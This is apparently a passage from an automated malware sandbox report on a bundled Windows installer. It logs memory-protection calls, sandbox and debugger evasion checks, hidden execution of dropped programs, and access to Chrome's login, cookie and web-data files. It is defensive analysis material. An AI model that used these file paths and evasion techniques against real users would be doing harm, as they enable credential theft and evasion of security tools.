NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00611000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00613000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x728d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x728d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02400000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02410000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02440000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03d90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03da0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03dc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03dd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03de0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03df0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03e00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03e40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:41 p.m.	process_identifier: 1912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03e50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 2776 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6db41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6db42000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 19, 2021, 6:42 p.m.	process_identifier: 2776 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00440000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW June 19, 2021, 6:42 p.m.	total_number_of_free_bytes: 13721784320 free_bytes_available: 13721784320 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (13 events)

file	C:\Program Files (x86)\VR\Versium Research\Uninstall.exe
file	C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\_isetup\_shfoldr.dll
file	C:\Program Files (x86)\VR\Versium Research\Versium.exe
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe
file	C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\itdownload.dll
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
file	C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\Setup.exe
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg
file	C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.exe
file	C:\Program Files (x86)\VR\Versium Research\RunWW.exe
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat

Creates a shortcut to an executable file (12 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk

Drops a binary and executes it (8 events)

file	C:\Program Files (x86)\VR\Versium Research\RunWW.exe
file	C:\Program Files (x86)\VR\Versium Research\VisitTR.url
file	C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe
file	C:\Program Files (x86)\VR\Versium Research\Versium.exe
file	C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\Setup.exe
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
file	C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\Setup.exe
file	C:\Users\test22\AppData\Local\Temp\is-KD3C2.tmp\Versium.tmp
file	C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-FEBQS.tmp\itdownload.dll

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 19, 2021, 6:41 p.m.	show_type: 0 filepath_r: C:\Program Files (x86)\VR\Versium Research\RunWW.exe parameters: filepath: C:\Program Files (x86)\VR\Versium Research\RunWW.exe	1	1
ShellExecuteExW June 19, 2021, 6:41 p.m.	show_type: 0 filepath_r: C:\Program Files (x86)\VR\Versium Research\VisitTR.url parameters: filepath: C:\Program Files (x86)\VR\Versium Research\VisitTR.url	1	1
ShellExecuteExW June 19, 2021, 6:41 p.m.	show_type: 0 filepath_r: C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe parameters: filepath: C:\Program Files (x86)\VR\Versium Research\BSKbrowser.exe	1	1
ShellExecuteExW June 19, 2021, 6:41 p.m.	show_type: 0 filepath_r: C:\Program Files (x86)\VR\Versium Research\Versium.exe parameters: filepath: C:\Program Files (x86)\VR\Versium Research\Versium.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 19, 2021, 6:42 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process versium.tmp (1 event)

Time & API	Arguments	Status	Return	Repeated
recv June 19, 2021, 6:41 p.m.	buffer: HTTP/1.1 200 OK date: Sat, 19 Jun 2021 09:42:11 GMT server: Apache last-modified: Fri, 18 Jun 2021 21:49:02 GMT accept-ranges: bytes content-length: 459836 keep-alive: timeout=3, max=200 content-type: application/x-msdownload x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains; preload; referrer-policy: no-referrer-when-downgrade connection: close MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^BàF\|hT`@0w³@°ÜðàCODEÌDF `DATA(`J@ÀBSSõtÀ.idata°t@À.tlsÐÀ.rdataà@P.relocð@P.rsrcÜ¨@P ²@P received: 1460 socket: 1432	1	1460	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (19 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW June 19, 2021, 6:41 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:41 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:41 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:41 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:41 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:41 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:41 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:41 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 19, 2021, 6:42 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (18 events)

description	Virtual currency	rule	Virtual_currency_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Virtual currency	rule	Virtual_currency_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 85 events)

Time & API	Arguments	Status	Return
RegOpenKeyExA June 19, 2021, 6:41 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{EA3D5897-E440-4DAF-942D-2598B876B8CA}_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{EA3D5897-E440-4DAF-942D-2598B876B8CA}_is1		2
RegOpenKeyExA June 19, 2021, 6:41 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{EA3D5897-E440-4DAF-942D-2598B876B8CA}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{EA3D5897-E440-4DAF-942D-2598B876B8CA}_is1		2
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000644 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: AddressBook base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: Connection Manager base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: DirectDrawEx base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: EditPlus base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: ENTERPRISE base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: Fontcore base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: Google Chrome base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: IE40 base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: IE4Data base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: IE5BAKEX base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: IEData base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: MobileOptionPack base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: SchedulingAgent base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: TonerRecover 1.00 base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TonerRecover 1.00	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: Versium Research 10 base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Versium Research 10	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: WIC base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW June 19, 2021, 6:42 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x00000644 key_handle: 0x00000648 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1	0
